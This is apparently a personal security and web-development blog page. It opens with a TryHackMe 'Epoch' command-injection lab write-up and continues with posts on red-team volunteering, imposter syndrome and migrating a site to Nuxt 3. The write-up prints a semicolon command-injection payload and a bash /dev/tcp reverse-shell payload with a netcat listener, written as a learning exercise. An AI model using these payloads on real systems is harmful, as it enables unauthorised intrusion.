Security Research & Web Development

Latest articles

Epoch Room Writeup

My approach to writeups:

Before we get into the post, for me creating writeups is primarily a learning exercise. While documenting how I reached the solution is an important part of a writeup what I care about more is the thought process of working to find the solution, both the obstacles and eventual discoveries. By writing in this way it's my goal to improve my own thought processes and develop a more systematic methodology for approaching these problems over time. Consider these to be refined versions of my notes rather than polished reports.

Epoch was released as the second challenge during TryHackMe's 2022 Halloween event, and is classified as an easy web app room. The prompt for us is:

"Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps! Wait... it doesn't need to be online, you say? Are you telling me there is a command-line Linux program that can already do the same thing? Well, of course, we already knew that! Our website actually just passes your input right along to that command-line program!"

Between the above mention of command lines and the explicit link to their room on command injection it's certain this will be a command injection focused box. Once the VM was spun up all we see is a basic single input form.

a bare white web page with a single field input form and an hourglass icon with the text "Epoch to UTC converter"

While it was tempting to go straight into testing command injection, I did start this process with some initial enumeration to avoid missing anything.


This wasn't an open-ended web app challenge, so I just did some quick standard checks to cover the bases.

  • HTML source: this shows up as a single page, minimal markup, and no Javascript sources loaded in at all. The <head> metadata doesn't reveal any additional information.
  • Wappalyzer: Bootstrap is the only detected technology.
  • Directory enumeration: I ran gobuster in the background while beginning command injection tests, which returned no additional directories. Manual check for /robots.txt and /sitemap.xml while that ran also returned nothing.

With that brief recon done, let's move straight into trying out command injection on our form.

Testing command injection

Passing in a epoch value, like 1680115500, returns a more human readable date output below the form as text.

Note: If you want some background on the epoch format Wikipedia has a good primer.

With the expected output known the next step was to test the simplest command injections forms. The first to check is just appending a semicolon to the string and following it with a system command, in this case ;id, which will tell us if this form is returning the internal server's responses, doing some other processing first, or generate an error.

This payload works and we get the output of the id command after our date. No need to test other permutations now, though for reference if this hadn't worked I would have been working off of this command injection cheatsheet.

Form response showing a date on one line, and on the following the output of the Linux id command.

With the injection confirmed I ran other enumeration commands, including whoami, ls, and ls /, to get a quick sense of what we could see.

Now if this was a straight to the solution walkthrough we would almost be done...but with the command injection confirmed in my enthusiasm I skipped straight to trying to pop a reverse shell on it.

The shell popping detour

To get the shell I went to Pentest Monkey's RCE Cheatsheet for a bash specific payload, as this was clearly a Linux machine based on the earlier output from id, ls, etc. I set up a netcat listener on the Attackbox with nc -lvnp [port] and prepped the below payload in our form, clicking the Convert button once the listener was active.

;bash -i >& /dev/tcp/[kaliIp]/[kaliPort] 0>&1

And yup, this gives us a shell on the box, confirming remote code execution (RCE). While this will turn out to not be necessary to get the flag, it would be a major finding during an actual report, so it was worthwhile to test for it. Plus the shell is faster for my continued digging into the server versus passing in these individual command payloads anyway, making this detour a win win.

Web form with a bash reverse shell payload, and the resulting terminal with responses to id and whoami displayed.

For brevity's sake with shell access I spent some more time seeing what we had access to on the file system. We could read files in this user's home directory, /home/challenge, but couldn't look at root permissioned files like /etc/shadow. Our home directory had two Go files and their compiled binaries, plus a folder "views," which has a single index.html file. None of these contained our flag.

At this point I checked the provided hint "The developer likes to store data in environment variables, can you find anything of interest there?" and went down a rabbit hole about Go environment variables for a while.

For context I'm used to developing Javascript front-ends, so my immediate thought here was that these Go binaries might be storing their environment variables in a similar way, via .env files. But checking both the binary and .go files by running strings and looking for any declared variables went nowhere, and in some cases I was running into privilege limitations, so I started to investigate if I could get root, running the LinPEAS script...however this was also at a time in my studies before I'd learned much at all about Linux privilege escalation, so the output it gave me wasn't as actionable as it could have been (from research on Discord it was indeed rootable, but not relevant to the challenge).

But trying to get root aside this is where I also missed some important hints while doing the research on how Go handles environment variables. Namely the examples (#1 & #2) both show Go using the os package to interact with system environment variables. My mistake was that I had assumed that they were using development environment variables and went looking for those—and yes they are supported in Go with the godotenv package, but that package wasn't in use here, hence the dead end.

Now, how do you check system environment variables? By running the env command.

command injection output with the FLAG env variable and flag text obscured

Problem solved and flag found. This worked directly from the form, so the reverse shell wasn't necessary to get the flag.

My key takeway from this room was to always check env during enumeration if I have some form of shell access.

CyberForce 2022 Red Teaming Retrospective

Last fall I participated in the Department of Energy's CyberForce 2022 Competition as a red team volunteer. Right off the bat it was an excellent experience, and one I intend to repeat next year, armed with more knowledge to contribute to the competition prep process.

When I signed up for this competition as a volunteer I had just barely two months worth of heavy studying in cybersecurity. Fortunately the start of my studies happened to coincide with TryHackMe releasing a Red Teaming path, which I jumped on—partly for the giveaway competition that THM released alongside of it, but also because I felt like that was a good fit for the direction I wanted to move in, long-term, in cybersecurity. Admittedly jumping straight from refreshing IT fundamentals into red teaming material was a challenge, but considering this Cyberforce competition coming up, it was helpful to get my bearings and stress test my Linux knowledge with all the red team labs before game day.

I didn’t know what to expect from the competition when I signed up either. I had some minor exposure to traditional CTF competitions through a local BSides CTF one the month prior to this competition, plus solving a few of the easier challenges from the Hack the Boo event that Hack the Box was running last October. But Cyberforce turned out to be a drastically different type of competition.

Unlike a typical CTF, this competition where there are a set of challenges across a handful of categories, this part of Cyberforce has a more linear structure, aiming to simulate a series of scenarios that the competitors have to work their way through. I’m not at all familiar with the collegiate cyber competition scene, but if you are: Cyberforce is similar to how the National Collegiate Cyber Defense Competition (CCDC) is structured). But as this is sponsored by the Department of Energy they added an additional element: Industrial Control Systems (ICS) attack & defense.

What I liked about the competition

I don’t want to spend too much time describing the structure of the event, if you’re curious the about it the DoE maintains a page that’ll fill in the gaps (it’s also where sign-ups should go live later this year for the 2023 event in November). What I do want to mention are the areas I thought were unique and/or valuable, both as a red team volunteer and I hope also for the competing blue teams.

First, this competition evolves each year. The 2022 event I took part in was setup with each blue team having their own cloud infrastructure, and the rules included that several of the machines were to be designated “assumed breach” and couldn’t be hardened, only enumerated. Why does that matter? The scoring system rated each team based on their ability to find specific artifacts in the logs from the intrusion, and to cohesively report their findings based on those indicators. That meant as a red teamer here my goal wasn’t to find a way in, but instead to successfully execute a specific attack chain that the blue team was to be scored on, receive their report, and assign them a score based on its quality.

The other aspect of this scoring was that after each scenario the blue team received a guided walkthrough of the scenario execution, aimed specifically at helping them find the gaps where they may have missed something. I hope that helping the blue team out in this way facilitated deeper learning, I know on my end it was valuable. I had to figure out what/where they missed artifact(s) and translate what I did as an attacker into a suggestion for where or how to find the necessary evidence. I was certainly grateful for having studied some incident response fundamentals before the event, as it would have been much more difficult to facilitate the blue team’s learning without understanding the basics of logging, EDR, IDS/IPS systems, etc.

Takeaways from the red teaming volunteer experience

As for the red teaming itself, well, I can’t get into details of what was done all that much here, but I enjoyed all the practice in the days leading up to the event, and the event itself. I think the red team leaders found the sweet spot between accessibility to diverse skill levels for the volunteers and giving the blue teams a realistic simulation of actual attacks.

While I wouldn’t consider this an experience that gave me a full sense of how a red team engagement works in practice—there was no way to have enough time in a single day to do proper recon and enumeration and try to find a foothold for one team, let alone dozens—it did give me a better hands-on feel for the tactics that differentiate red teaming from pen testing: lateral movement, pivoting, persistence, and post-exploitation (among others). As the ICS aspect was designed to be central all our attacks targeted those systems and/or their interfaces in some way, which put a fine point on why those critical systems should be air gapped. Also we got to rick roll both the blue and green teams. 😈

I would say that much of what I learned was in the smaller details of how to conduct red team exercises and improvements to how I used and managed the process within the Linux VM. There are two things I’d like to highlight from what I learned:

  1. pushd and popd are useful Linux utilities I hadn’t heard of before, and proved useful in running operations in specific directories without having to bounce around directories with cd at all.
  2. Autovnet: was the star tool that I have to mention. It was fantastic for the realistic simulation aspect of the competition, allowing the dozens of red teamers, all handling different blue teams, to work without collision and use independent C2 infrastructure and IPs.

Wrapping up

CyberForce was a great experience and I'm looking forward to doing it again in 2023. Hopefully I’ll be able to contribute earlier in the process to refine the attack chains and test my knowledge of building them, even if just a little bit.

If you're curious about red teaming it's a good place to get some rare exposure to the process, even if in a very condensed format, making it an easy yes to give it a shot for newbies. For experienced red teamers: if you have the time to help in the R&D phase of building attacks it can be particularly worthwhile if you have some ideas to test out. If Windows and Active Directory are your jam, definitely consider contributing for 2023, there’s an active call for more of those methods to be used in the coming competitions.

Worst case if you’re a bit short on time and can’t commit to extended contribution the Saturday of the competition was fun, if at times chaotic, on its own.

"Sorry for the delay!..."

We've all done it before. You get an email, see that it’ll take a bit of work to reply and make a mental note to reply later that day…which becomes a couple days, max…then a week or more…. The weight of that embarrassment grows until it’s easier to have selective amnesia about receiving it than to reply. You almost always end up getting back around to it, but it just feels more and more painful to do the longer you wait. Well for me cybersecurity is that feeling: career edition. I began with cyber as my planned major straight out of high school, got into a university with a strong cyber program, started attending said school, and then life happened differently than planned and I’ve ended up with a distinctly non-linear career path since, which, thus far, hadn’t included cybersecurity as a career at all.

Well, now I’m returning to that early focus on cybersecurity. And sure, that’s a useful announcement to make on its own I suppose, but the reason I’m writing this is that there’s a useful thread woven into the more complex story (which I may tell in more detail later). That thread’s major theme is imposter syndrome.

Is passion required?

Imposter syndrome is something I’ve felt (and continue to feel) in many arenas that I’ve gone on to invest significant time and effort into, but the imposter feelings in cyber are ones that managed, the first time, to kick my ass to the point of not pursuing it further or sooner. A younger version of me would justify that choice to quit with the overplayed pretense of “you just didn’t want it enough” which the (hopefully) wiser present-me would tell them that’s some hustle culture bullshit that doesn’t understand how motivation works in practice.

After all, it would be tempting to conclude that you aren’t passionate enough and call it a day, except for two things: if you didn’t care about it at all, imposter syndrome wouldn’t show up, because the imposter feelings arise from comparing yourself to others or to some high personal standard. The more insidious thought is that passion is billed as the solution to both finding happiness in a career and overcoming obstacles to success. But it also creates a vicious cycle where it’s easy to convince yourself of narratives like that one before. “If true passion means sure success, then that means if I was truly passionate about this thing, I would be better at it.” Right now though the larger problem is that the typical narrative here also assumes that passion precedes skill, when in practice it’s often the practice that develops a passion. Why? I’ll get to that in a moment, but first back to me and cybersecurity.

Imposter syndrome seems to be extra strong in the technical aspects of cybersecurity. There’s a simple, partial explanation: it’s a massive field in which going from beginner to expert on even one domain feels like a monumental task. But that’s really not unique to cyber; I’ve been working in film for more than seven years and each department has its own rabbit holes and deep specialities that could feel insurmountable to a newbie.

One aspect in cyber that amplifies the imposter feelings has been the media profiles and narratives that exist around cybersecurity experts. These stories portray people who seem to live and breathe tech, code, and computers and because of their preternatural skills they go on to accomplish impressive feats at early ages: breaking into computers in grade school, developing a popular program at 15. All those stories lean on the passion hypothesis for why people learn and develop mastery in a field, but passion doesn’t always come first. In my own experience, it more often develops later on¹ . Maybe there’s a spark of curiosity about a subject first, but the passion (or its more intense manifestation, obsession) shows up after I’ve started learning, not before. With my film career, I never had it on my radar before getting a few small opportunities to work on set with zero prior experience, and I gradually developed a deeper interest in the craft from that point.

With cybersecurity, I think that lack of hands-on exposure early on was my biggest obstacle. I’d read books on the subject and had maintained a consistent curiosity, but I hadn’t had the opportunity to validate through experience that I did indeed want to learn more.

Imposter syndrome as a beginner

As general advice for dealing with imposter syndrome, recognizing that even the expertest of experts often feel like imposters and that we’re all making it all up as we go might help, sometimes.

For beginners though, I don’t think that piece of advice is apt. I’ve spent a good number of years working as a coach, and have developed a curiosity about learning and what helps us stick to our learning goals. My feeling is that for beginners, feeling like an imposter comes up most often when we aren’t understanding something or are running into more obstacles than successes. While there are people out there that enjoy bashing their head against a problem until it eventually works, that’s not everyone by any means, and we lose a lot of potentially good people by setting the bar so high that it’s necessary to persevere for an irrationally long time with not even a glimmer of success. There is a place for mind-bendingly difficult problems, but it isn’t anywhere near the beginning, where the foundations for how to think about solving the problem haven’t even been established.

As an example: there’s an alternate universe where I got deep into skateboarding, but when I was twelve and grinding away at learning the kickflip it felt like I would sooner obliterate my shins than land the trick. I might have persisted if I had either a community that was helping me improve, or a better progression to learning (this was all pre-Youtube) that didn’t mean every failure hurt too much to go straight back to trying again.

And you know what? Sometimes people don’t have time to suffer through an opaque learning process, whether due to other obligations, or because there are several competing interests and if you have to choose between the one that’s going to burn twenty hours or more in just getting to the starting line vs. another that’ll let you learn straight away…the latter is likely to win out. I was looking at cyber seriously again around 2015, which coincided with when I chanced into working in film, and with the hands-on learning while getting paid versus an uncertain road of learning the skills, needing to drop a few thousand on classes and certifications, and crossing my fingers for a job after all of that upfront investment, it’s easy to see why working in film won at the time.

Overcoming imposter syndrome

Several years later, there seems to have been a renaissance in cybersecurity education. I saw that TryHackMe (THM) had a free tier to try things out, so I figured I might as well test the waters and see if hands-on practice would change my mind about cyber this time around. Did it work? Absolutely.

Being able to spin-up a ready-made virtual machine with specific challenges feels great, as you get to learn discrete concepts and apply them immediately without having to wonder if it’s not working because you did it wrong, the config is wrong, or one of any other myriad possible reasons why your setup isn’t working as intended. THM got the ball rolling and helped beat back some of the beginner-specific feelings of imposter syndrome and sense of overwhelm that this field easily provokes.

With the momentum from those initial hours of success in THM rooms, when imposter syndrome has inevitably reared its head again—which, with some CTFs, I was working through was almost daily—I’m able to put my attention towards finding small wins that keep up the feeling of momentum, even if in other areas I’m feeling stuck and like I don’t know, or will ever know, enough to succeed at them. The sweet spot for long-term learning is where it’s hard enough that you’re a little uncomfortable and unfamiliar, but success still feels within reach.

I’ll be writing more about the specifics of my cybersecurity learning journey here later on. For now, I’ll share one of the more helpful metaphors I’ve learned about fear, of which imposter syndrome is just one variation. To paraphrase Seth Godin: fear is better seen as a dance partner than an enemy. Fear shows up when there are opportunities for growth. When fear pushes back against you, it’s a signal that what you’re doing has the potential to expand your comfort zone, skillset, and life.

When imposter syndrome shows up, treat it as a sign that you’re going in the right direction.

¹ For an exploration of why skill often precedes passion read Cal Newport's book So Good They Can't Ignore You.

Migrating from Gridsome to Nuxt 3

It's official, this site is now running on Nuxt 3!

My last big site update to switch into the Vue ecosystem with the Gridsome framework was a few years ago. Overall Gridsome has been a great framework to use for building a static site using Vue 2, and a Vue 3 upgrade was on its roadmap, but like many projects the updates haven't continued—coincidentally they stopped shortly after I transitioned to it in November 2020. With everyone still deep in the pandemic it wasn't exactly top of mind to worry about a little Javascript framework receiving updates regularly. Fast forward about a year though and Nuxt 3 announced their beta. With no updates forthcoming to Gridsome I kept it in the back of my mind to test Nuxt out. It was testing out the Content module that convinced me I should make the switch, as it was going to solve a few of the pain points that Gridsome has with using Vue components within markdown.

Nuxt 3 had its first stable release in late 2022 so with that it was time to make the transition. On paper this switch shouldn't be a complex migration, considering both of these are VueJS frameworks, but it is a jump from Vue 2 to Vue 3, with some breaking changes to consider. For me though the main point of migrating, beyond keeping the site updated, is to continue learning and this project meant I had the excuse to get more practice with Vue 3, Typescript, Tailwind, and newer build tooling like Vite.

What you're seeing now is a relatively quick MVP of the Nuxt version of this site. My original intention was to tear out all the old CSS and do a refactor with Tailwind, but as I consider this design to be a temporary one while I think up a stronger visual identity it made more sense to see how well the Gridsome build would transition over without major surgery.

First impressions of Nuxt 3

There are a handful of changes in Vue 3 and in the way Nuxt is configured that make for an easier dev experience compared to Gridsome. The biggest change is Vue's composition API, which is used throughout Nuxt and especially in the Content module that powers all the markdown rendering on this site. Compared to Vue 2's mixture of mixins, filters, and plugins it is a more consistent system. Running Vue 3 under the hood also removes the need for little things like using this.someProp in computed functions. It also helps with better code organization in single-file components plus native Typescript support.

That's all Vue 3, now for Nuxt specifically the largest improvements have been in overall developer experience: auto-importing components, intuitive directory-based routing, and a lot of excellent modules to add functionality to the site—for this site I'm currently using Content, VueUse, a native Nuxt Tailwind module, and Google fonts integration. There are many many others, some of which I'm sure I'll test out as I continue to improve the site like color-mode for easy light/dark switches, Image for well...image optimization, Pinia for state management, an security module, etc.

Plus the Content module specifically has a few nice features from nice to have to excellent: a built-in table of contents generator for long posts like this one (you still need to make a component but the linking part is handled, more on that later); markdown components (MDC) so that it's easier to mix vanilla markdown with Vue components for handling functionality like shortcodes; a query API that uses a MongoDB like document syntax but is otherwise normal Javascript—I liked Gridsome's GraphQL integration overall, but it did add another layer of complexity to the data handling process.

I've still got a lot to explore with Nuxt 3 so I'll be sure to update on particular bits I've found later. For now let's move on to specific details of the build and some of the challenges I had to solve to get it running.

The Migration & Build

For this project I decided my approach would be to start by installing Nuxt in a fresh repository, getting a baseline version that renders out without errors, then introducing my old components from Gridsome one-by-one with, fixing the obvious syntax differences, and then tweaking them until the errors cleared.

To get the fresh install going the Nuxt docs are well written and it was simple to start a project. In my case using NPX with npx create-nuxt-app <my-project>. This create-nuxt-app tool has a lot of handy defaults that you can select, including CSS frameworks, linting, Typescript useage, test frameworks, etc. In my case I kept this fairly light: Tailwind, Nuxt Content, ESLint, and Universal rendering selected (which allows for both SSR and static generation).

Once that runs we have a new directory that starts us off with a minimalist project with only a few files: a main app.vue entry point, nuxt.config.ts, and tsconfig.json files. From there to quickly mockup our directory structure and fill in a few essential pieces we can create the root /components, /pages, /assets, and /static directories. Next to quickly create boilerplate pages and components we can use the Nuxt's CLI, Nuxi, by running nuxi add component componentName to scaffold our components (this supports all the major types) and nuxi add page pageName for initial pages.

As a quick aside: our create-nuxt-app method handled getting our module dependencies installed for us. To add additional ones, or to make modifications to their configuration, you have to edit nuxt.config.ts. With Gridsome there was a main.js file in the root that handled CSS imports and other Javascript dependencies, but with Nuxt those are also all handled in the config file. It is also responsible for site-wide head metadata and some of the Nitro server's behavior (this will come up later when setting up sitemaps and RSS).

As we're using the Content module for handling or copy and media rendering the other piece we need to setup is creating a /content directory. Nuxt Content will parse any .md or .yaml files in that directory, generating routes for each based on its path. But to actually render those views we need to cover two areas: our layout and the individual page views.

The simplest way to handle site layout, as recommended in the Getting Started docs, is to create an app.vue file in the root directory which includes the NuxtPage component, which itself is acting as a wrapper around Vue Router's RouterView component. The baseline component will look like this:

<NuxtPage />

But in my case I want to future proof my design a little and allow for multiple possible layouts, so I also created a component in the layouts directory, /layouts/default.vue, where I handle loading in all the child components necessary to the basic layout. Now to make this work we need to also wrap our NuxtPage component in app.vue with <NuxtLayout></NuxtLayout>. Lastly we need to include a <slot /> in our new layout file where we want our content to be loaded.

With that the layout set I have two major content types that need to be rendered from Markdown: general pages and blog posts. Nuxt makes this easy as it supports dynamic routing with a bracket syntax to denote the variable [slug].vue will generate a route per unique slug, and it supports other route parameters and custom parameters as well. Nuxt also supports using the spread operator (...) with our parameters to create a catch all dynamic routes like [...slug].vue. With that catch all route component you could render out *all of your markdown content with just this in your component:

<ContentDoc />

Under the hood ContentDoc automatically accesses the current route parameters to source the correct data and render it out to the page. Even though this [...slug].vue template lives in the root, it will also automatically create routes for pages nested further into the folder hierarchy defined in /content. If that's all you need then great!

If you want to have more precise control over certain page templates you can go further, as I did, and define additional route specific components. I added support for specific blog components in order to add functions like pagination and tags that aren't needed by other pages. To create those dynamic route I created a subdirectory of /pages/blog for our routing, with a dynamic route of /pages/blog/[slug].vue, and an index page to catch anyone going to /blog that is /blog/index.vue. Nuxt's behavior is similarly to CSS here, where if there are multiple matching components it could use to manage dynamic routes, it will favor the most specific one, only choosing a more generic option (like our root [...slug].vue) if it doesn't find any others first. With this done we have all our routes rendering out for any page that was created within /content!

Displaying metadata

The catch though with the ContentDoc method above and is that it only takes in the body of a markdown document. My markdown docs also contain metadata inside of a YAML formatted header. Nuxt already reads this data correctly, but it doesn't include it in the rendering using the above method. In working on this I discovered at least two ways to address this issue. The documented method is to use ContentDoc with a v-slot attribute: <ContentDoc v-slot"{ doc }">, which gives us an object to work with, which is then passed on to a nested ContentRenderer component with <ContentRenderer :value="doc">. We can then nest HTML inside to access our individual metadata items with the standard Vue double mustache syntax <h1>{{ doc.title }}</h1>. For rendering the body of our markdown content the last step is to nest the one last component: <ContentRendererMarkdown :value="doc" />, with our value attribute taking the whole object loaded in from ContentDoc earlier. A Full example below.

<ContentDoc v-slot="{ doc }">
<h1>{{ doc.title }}</h1>
<time>{{ }}</time>
<ContentRenderer :value="doc" />

In my early testing of my build this approach worked well, and its still in use for my catch-all pages route. But while I was researching the best way to add pagination functions to Nuxt I found an excellent Nuxt 3 blog written by Debbie O'Brien. While looking in her site's Github repo I saw that she implemented the above metadata and routing functions differently, loading in the our markdown page's object within the scripts section of the component, rather than in our template, leveraging the useAsyncData method to access one of Nuxt Content's main composables: queryContent(). This approach has the advantage of allowing us manipulate and format the data within our Javascript first, before passing it off to the template. In some more specific use cases this would also allow you to take that data query and destructure the object to only bring in what you need in this specific component. This method will also come in handy for more complex queries, as it accesses the MongoDB like query API that Nuxt Content is using.

With the above approach the /blog/[slug].vue component ends up looking something like this:

const { data: blogPost } = await useAsyncData(path.replace(/\/$/, ''),
() => queryContent<BlogPost>('blog')
.where({ _path: path })
const title: string = blogPost.value?.title || ''
const date: Date = blogPost.value?.date || ''
// ...
<article v-if="blogPost">
<header class="mb-8">
<h1 class="mb-0">{{ title }}</h1>
<div class="blog-date mt-1">
<span>Published on <time>{{ useDateFormat(date, 'D MMMM, YYYY').value }}</time></span>
<ContentRenderer :value="blogPost" class="shiki">
<template #empty class="shiki">
<p>No content found.</p>

A few small notes on this version:

  1. having the <template #empty> segment is necessary here otherwise the page will render out with no body content.
  2. the useDateFormat you see for our date is a composable from the super handy VueUse module. I had initially went into Vue 2 mode and wanted to create a filter, but that's not the Vue 3 way. Using a composable is how a global utility function should be implemented in Vue 3.

At this point just using the above components plus your general layout components for handling the header, footer, navigation, etc. are enough to have a functional site for reading the pages and posts. However, as this is a blog I'd be remiss not to add some basic RSS and sitemap functions to it as well.

Nuxt Servers: RSS & Sitemaps

Discussing Nuxt servers in-depth is beyond the scope of what I'm trying to do here, if you're curious read the docs as a starting point. For me right now the goal of using server functions is to create XML routes that add sitemap and RSS functionality to the site. With Nuxt server we need to place our scripts in the /server/routes folder for each of them to have a route directly off the root domain.

For our sitemap, we can make use of the documentation on this function from Nuxt Content as this works well enough as described. Create a sitemap.xml.ts file in our server routes directory and you can copy the code in the docs, set the nitro server config as specified, and update the hostname URL value to have a working sitemap on the route /sitemap.xml.

For RSS, our server setup works differently as I want to limit the query to just the blog posts. In the future I may try and break this out into categories, but for now the implementation written up here worked as expected. Just be sure to install the rss library from NPM as a dev dependency, which wasn't mentioned explicitly in that guide. With that complete our RSS feed is accessible at /rss.xml.

Leveraging the table of contents feature

Writing lengthier posts like this one brings us to one of the last features I wanted to have working on version 1 of this site: table of content lists. Nuxt Content comes with a built-in table of content generator on any markdown file that it parses and renders out. Out of the box this feature will walk through your markdown content looking for headers (header depth is defined in nuxt.config.ts, see the docs). For the headers it finds it will automatically add an id attribute to the header tag, matching the header text, along with a nested anchor link in the format of #your-route-slug-here.

The small downside to this is if you don't touch it otherwise, it'll make all your headers into links, visually, so I setup a quick CSS adjustment to strip them of the default link behavior:

a[href^="#"] {
pointer-events: none;
text-decoration: none;

However, that's where the plain install of Nuxt Content stops with the TOC feature. To make it use of those anchor links we need to create a component. Debbie's Nuxt repo from earlier already has a TOC component, so for simplicity I implemented that component, with some stylistic adjustments, and it immediately worked as intended. The one tweak I've made is to have the TOC as an optional component, rather than including it by default in every blog post. This was accomplished with a simple metadata property in the markdown header, hasToc: true, and a v-if statement on the div wrapping our component v-if="hasToc". I considered trying to make this work using an MDC (markdown component) within the markdown file, as an excuse to figure out how Nuxt handles MDC, but based on the docs MDC doesn't support passing in objects as props, so it wouldn't work in this case...and in hindsight would have been a pain to reposition.

Future plans

As a starting point for this site I'm pretty happy with how it's running now. However this was always intended as a transitional phase, as my long-term goal is to shift this site into a monorepo structure that I think Nuxt, with its auto imports and heavy use of composables, is well-suited for. That should help with my overall goal of having a more DRY development process for my own internal projects, so that I can easily share work across without needing to manage multiple repositories.

Beyond that big picture structural shift, I'm expecting to tinker around the edges of this current version. Implementing some necessary features (full pagination, search, categories and tags, etc.) plus nice to have tweaks to the design that include animations, improvements to navigation, and other miscellaneous elements. Concurrently with those improvements I'll be thinking up a stronger visual identity to this place. I had originally built this site as a sort of base template test, with good typographic defaults, to build on top of so the design is rather bare bones. But the real major priority now that the migration is done is to start putting out more writing, so the design updates will come in time.

Static site updates with Gridsome

Wow, it's been about five years since I first made the switch to static sites and made the switch to having all of mine built with Hugo. The upsides were so good, the lack of need to keep on top of them updates wise for them to continue to live (worry free) on the internet that once I wasn't regularly writing new articles to them I was able to forget about them until the next time I needed to make changes. With significant shifts in my career since that time I'd spent much less time updating the sites, keeping in mind a long-term idea to maybe add some nice front-end functionality via Vue.js—mostly an excuse to keep my skills sharp.

Fast forward to last year and I had found a nice Vue framework, Gridsome that I had begun to use for a more complex internal project and was gradually tinkering with it. Around that time it finally reached the point where I needed to make some changes to the live Hugo sites, and as part of that process also update Hugo to the latest version. Unfortunately the updates had made some changes to template language and other areas that were silently failing in the build, and after a few days of frustration there I decided that I may as well try Gridsome with at least one and see how it goes. I was particularly drawn to the GraphQL based queries that it used to make the Vue templates work, which I thought would make creating a nice, non-Google based, site search work beautifully. Plus, keeping my learning-orientation going I saw that Gridsome gave you more control over the site, because in creating Vue templates you also had the ability to write the front-end logic and share data between components as you would with any front-end application, and of course I would be working in Javascript (and Vue) instead of a template-only use of Go.

The downside? It taking more work. I still strongly recommend Hugo as it works well without significant setup, and is probably still able to build large sites faster. Hugo had a lot of developer effort, even in the early stages, for creating internal tools like pagination, various media embeds (Youtube, Instagram, etc.), and metadata handling that you didn't need to do as much work up front, sure, if you were like me it still required writing the HTML templates, configure the toolchain for postCSS to handle styling, and then write the necessary CSS code, but beyond that you put markdown files in directories with some basic metadata and it generally worked straight away. Which isn't to say Gridsome doesn't, mind you, it does require initial configuration, unless you pick a starter project you like and use that without modification, in which case it also just works.

In my case I started from scratch. Getting a basic blog setup with a list of posts and individual entries to view is simple on its own. The combination of being able to use GraphQL to handle the specific queries, and much of the metadata, and still use markdown files as the source means structurally it's similar: make a markdown folder for the specific content type, add things there, and have a corresponding template for it to work with. I do really really like Vue's use of single-file components however, I love having the template's layout, scripts, style, and in this specific case GraphQL query visible in one place as it's wonderful for understanding what each component is doing at a glance.

The upside of more configuration required up front is overall more flexibilty, especially as there is already a solid Gridsome plugin ecosystem, which itself can rely on the larger library of Vue plugins for additional functionality. Plus in having to handle the configuration plus writing the code for template logic and behavior I'm more aware of and in control of what the site can do. The practical example here is the per article navigation. There is already a built in paginator component for handling the list, which I'm using, but for individual pages there wasn't a built-in way to do it. To make it work I wrote (with liberal borrowing of another site's working implementation) a few computed functions that used the GraphQL query to determine the next and previous blog post paths. That same method could be used to create more situation specific setups like post series links, related content based on tags, or for more commercially oriented sites having calls-to-action for specific products. For a server-side app this wouldn't be that special, but keep in mind this is a 100% static site, which has the ability to display dynamic data (see the search comment above).

Okay, I'll leave it there for now, I don't want to write-up anything exceptionally technical about it for the moment. I have two of my three main sites done to a basic level with this build now, and made a starter project from it which sped the second design up significantly. The third will likely take a similar amount of time, though I'll get to test a non-blog style page layout for handling a content portfolio which I haven't done for either of these.

And most importantly, now that these are done and I don't feel that I need to fix fundamental build issues with old sites I have the one big roadblock to writing and publishing new posts out of the way, not to mention other major projects I've been thinking about. This has been a very important first step.

Static or Dynamic?

Cleaning up some hacked Wordpress sites recently reminded me of why I had shifted my own sites away from it and onto simpler tools which create static sites—tools that result in pure HTML/CSS/JS loaded directly in the browser, no server side processing required.

The original impetus for my own move was to remove the headaches and hassles around securing and maintaining Wordpress sites; note though that you could substitute Wordpress here for any other popular framework, particularly a CMS (Content Management System), Wordpress just happens to be a big target due to it's popularity. It isn't that Wordpress is bad, full-stop, but instead that I wasn't using any of the features that would have made the costs of maintaining it worthwhile.

Sidebar: Amusingly none of the features that I would find useful enough to choose Wordpress were what Wordpress was originally built for, namely blogging. It's evolved far away from it's original purpose as a blogging tool; one of the reasons why this blog began on Ghost.

How will someone use your site?

Will they be reading articles, watching videos, listening to podcasts, or more broadly consuming what you create? Or will they (also) be interacting with either your content or each other?

Only the latter justifies a dynamic site, because it requires a form of user authentication and user accounts to make it work.

There's a third case here, around eCommerce, but that's far more dependent upon the project's size and type of products being sold. There are solid 3rd party services that can handle transactions without needing to manage a store directly on your site.

The 2023 update

Weird to see when I originally wrote this piece, which was a quick bit to explain to myself the reasoning for choosing a static site at the time. The logic for the decision has held together, and even in some cases become stronger. The security benefits remain as strong, and with more options for integrating APIs and third-party tools it continues to make sense to maintain a light footprint static site like this for what I do.

In 2015 when I first began exploring using static sites the term JAMStack (Javascript, APIs, Markdown) hadn't yet been popularized—2016 has that honor according to's own home page. At the time I was settling into using static site generators, first Hugo and then the more recent pivot into using my own sites as a means of dogfooding Vue. For me static and JAMstack made sense, as I was already maintaining my own code, and it was overall less work to maintain a small Go or Vue based site, with some Node based build tools, than the more traditional server and database backed architecture.

I was making that switch for myself, but if I were taking on web development clients at the time I wouldn't have recommended JAMstack as an approach to them, despite saying above that the only justification for a dynamic site is user accounts and interaction. But the reality is that user accounts to create the pages, posts, etc. also count, and there is still utility there; that is why systems that have some kind of central CMS, like WordPress, Squarespace, Ghost, etc. were still better choices for non-developers because the means of interacting with the application than purely via text (via markdown) and Git commits. As I'm both a developer and have gotten very comfortable with markdown handling everything about my site inside my IDE is my comfort zone, but I guarantee you that it's a text-only hell for most folks.

Has anything in that department changed since 2015? Yes and no, it's a bit like a barbell: all the weight is on both ends and almost none in the middle. In the world of static sites it does still seem to require that kind of hands-on-code work to run them, so they remain suitable for developer types. While in the DIY and low-to-mid website building space, for those who don't want to code, it still makes sense to make use of larger platforms like those mentioned earlier, and both those and others (like Wix) have improved in their designs and UX since then.

JAMStack becomes a great choice again once you have a team though, as the API part of the JAMstack architecture means you can take advantage of building an independent front-end that can work together with tools like headless CMS (for your content and marketing teams), serverless functions for some types of on-site interactions, and can then decouple your backend services in a way that makes for a more flexible set of systems well suited to all the potential applications that might need to consume data from that backend API (web, mobile, etc.).

Building a Static Site with Hugo

Well, that took longer to complete than expected (as always). After experimenting with Docpad for a while I stumbled onto a number of other static site generators, finally selecting Hugo. Hugo's speed—it regenerates the whole site (all 140 pages) within ~1.5 seconds—combined with the flexible structure convinced me to give it a go.

